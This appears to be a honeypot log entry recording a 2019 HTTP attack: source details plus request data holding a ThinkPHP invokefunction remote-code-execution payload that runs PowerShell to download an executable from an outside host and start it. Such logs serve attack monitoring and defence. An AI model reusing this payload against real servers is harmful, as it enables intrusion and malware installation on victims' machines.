Attack 474d57ad-a784-4b8f-854b-c375d2b76617
Details
ID |
474d57ad-a784-4b8f-854b-c375d2b76617 |
Attack Type |
http |
IP Address |
124.205.27.10 |
Username |
|
Password |
|
Client Version |
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) |
Country |
China |
Date |
2019-01-19 04:05AM |
Request Data
{
"path": "",
"method": "GET",
"headers": {
"Accept": "text/html, application/xhtml+xml, */*",
"Connection": "Keep-Alive",
"User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
"Cache-Control": "no-cache",
"Accept-Encoding": "gbk, GB2312",
"Accept-Language": "zh-cn"
},
"hostname": "168.235.81.160:8080",
"form_data": {
"s": "index/think\\app/invokefunction",
"vars[0]": "system",
"function": "call_user_func_array",
"vars[1][]": "cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/6.exe')",
"start C:/6.exe": ""
}
}